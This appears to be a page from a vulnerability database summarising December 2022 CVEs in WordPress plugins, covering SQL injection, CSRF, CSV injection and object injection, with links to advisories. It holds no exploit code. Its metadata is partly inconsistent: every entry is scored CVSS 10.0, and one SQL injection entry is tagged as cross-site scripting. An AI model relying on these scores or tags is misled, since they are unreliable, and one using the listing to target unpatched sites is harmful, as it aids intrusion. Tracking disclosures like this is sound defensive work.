CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2022-46802 – WordPress Product Reviews Import Export for WooCommerce Plugin <= 1.4.8 is vulnerable to CSV Injection
https://notcve.org/view.php?id=CVE-2022-46802
09 Dec 2022 — The Product Reviews Import Export for WooCommerce plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.4.8. • https://patchstack.com/database/vulnerability/product-reviews-import-export-for-woocommerce/wordpress-product-reviews-import-export-for-woocommerce-plugin-1-4-8-unauth-csv-injection-vulnerability? • CWE-1236: Improper Neutralization of Formula Elements in a CSV File •
CVSS: 10.0EPSS: 8%CPEs: 1EXPL: 1CVE-2022-4049 – WP User <= 7.0 - Unauthenticated SQLi
https://notcve.org/view.php?id=CVE-2022-4049
09 Dec 2022 — The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. El complemento WP User de WordPress hasta la versión 7.0 no sanitiza ni escapa adecuadamente un parámetro antes de usarlo en una declaración SQL, lo que genera una inyección SQL explotable por usuarios no autenticados. The WP User plugin for WordPress is vulnerable to SQL Injection in versions up t... • https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 4%CPEs: 1EXPL: 1CVE-2022-4059 – Cryptocurrency Widgets Pack < 2.0 - Unauthenticated SQLi
https://notcve.org/view.php?id=CVE-2022-4059
09 Dec 2022 — The Cryptocurrency Widgets Pack WordPress plugin before 2.0 does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. El complemento Cryptocurrency Widgets Pack de WordPress anterior a 2.0 no sanitiza ni escapa algunos parámetros antes de usarlo en una declaración SQL a través de una acción AJAX disponible para usuarios no autenticados, lo que lleva a una inyección SQL. The Cryptocurrency Wi... • https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2022-4099 – Joy Of Text Lite < 2.3.1 - Unauthenticated SQLi
https://notcve.org/view.php?id=CVE-2022-4099
08 Dec 2022 — The Joy Of Text Lite WordPress plugin before 2.3.1 does not properly sanitise and escape some parameters before using them in SQL statements accessible to unauthenticated users, leading to unauthenticated SQL injection El complemento Joy Of Text Lite de WordPress anterior a 2.3.1 no sanitiza ni escapa adecuadamente algunos parámetros antes de usarlos en sentencias SQL accesibles para usuarios no autenticados, lo que lleva a una inyección de SQL no autenticado. The Joy Of Text Lite plugin for <... • https://wpscan.com/vulnerability/a282dd39-926d-406b-b8f5-e4c6e0c2c028 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2022-3241 – Build App Online < 1.0.19 - Unauthenticated SQL Injection
https://notcve.org/view.php?id=CVE-2022-3241
06 Dec 2022 — The Build App Online WordPress plugin before 1.0.19 does not properly sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection El complemento Build App Online de WordPress anterior a 1.0.19 no sanitiza ni escapa adecuadamente algunos parámetros antes de usarlos en una declaración SQL a través de una acción AJAX disponible para usuarios no autenticados, lo que lleva a una inyección de SQL. The Buil... • https://wpscan.com/vulnerability/a995dd67-43fc-4087-a7f1-5db57f4c828c • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2022-45079 – WordPress Loginizer Plugin <= 1.7.5 is vulnerable to Cross Site Request Forgery (CSRF)
https://notcve.org/view.php?id=CVE-2022-45079
05 Dec 2022 — The Loginizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.5. • https://patchstack.com/database/vulnerability/loginizer/wordpress-loginizer-plugin-1-7-5-cross-site-request-forgery-csrf-vulnerability? • CWE-352: Cross-Site Request Forgery (CSRF) •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 1CVE-2022-4120 – Stop Spammers Security < 2022.6 - Unauthenticated PHP Object Injection
https://notcve.org/view.php?id=CVE-2022-4120
05 Dec 2022 — The Stop Spammers Security | Block Spam Users, Comments, Forms WordPress plugin before 2022.6 passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain El complemento Stop Spammers Security | Block Spam Users, Comments, Forms de WordPress anterior a 2022.6 pasa la entrada del usuario codificada en base64 a la función PHP unserialize() cuando... • https://wpscan.com/vulnerability/e8bb79db-ef77-43be-b449-4c4b5310eedf • CWE-502: Deserialization of Untrusted Data •
CVSS: 10.0EPSS: 1%CPEs: 1EXPL: 2CVE-2022-25912 – Remote Code Execution (RCE)
https://notcve.org/view.php?id=CVE-2022-25912
05 Dec 2022 — WordPress plugins and themes may be using this package, however, may not be vulnerable to exploitation. • https://github.com/steveukx/git-js/blob/main/docs/PLUGIN-UNSAFE-ACTIONS.md%23overriding-allowed-protocols • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CWE-94: Improper Control of Generation of Code ('Code Injection') •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2022-45807 – WordPress WP Mail Log Plugin <= 1.0.1 is vulnerable to Cross Site Request Forgery (CSRF)
https://notcve.org/view.php?id=CVE-2022-45807
02 Dec 2022 — The WP Mail Log plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. • https://patchstack.com/database/vulnerability/wp-mail-log/wordpress-wp-mail-log-plugin-1-0-1-cross-site-request-forgery-csrf-vulnerability? • CWE-352: Cross-Site Request Forgery (CSRF) •
CVSS: 10.0EPSS: 0%CPEs: 1EXPL: 0CVE-2022-45822 – WordPress Advanced Booking Calendar Plugin <= 1.7.1 is vulnerable to SQL Injection
https://notcve.org/view.php?id=CVE-2022-45822
02 Dec 2022 — SQL Injection (SQLi) vulnerability in Advanced Booking Calendar plugin <= 1.7.1 on WordPress. SQL Injection (SQLi) vulnerability in Advanced Booking Calendar plugin <= 1.7.1 on WordPress. ... Vulnerabilidad de inyección SQL (SQLi) en el complemento Advanced Booking Calendar <= 1.7.1 en WordPress. The Advanced Booking Calendar for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.7.1 due to insufficient escaping on the user supplied parameter and lack... • https://patchstack.com/database/vulnerability/advanced-booking-calendar/wordpress-advanced-booking-calendar-plugin-1-7-1-unauth-sql-injection-sqli-vulnerability? • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •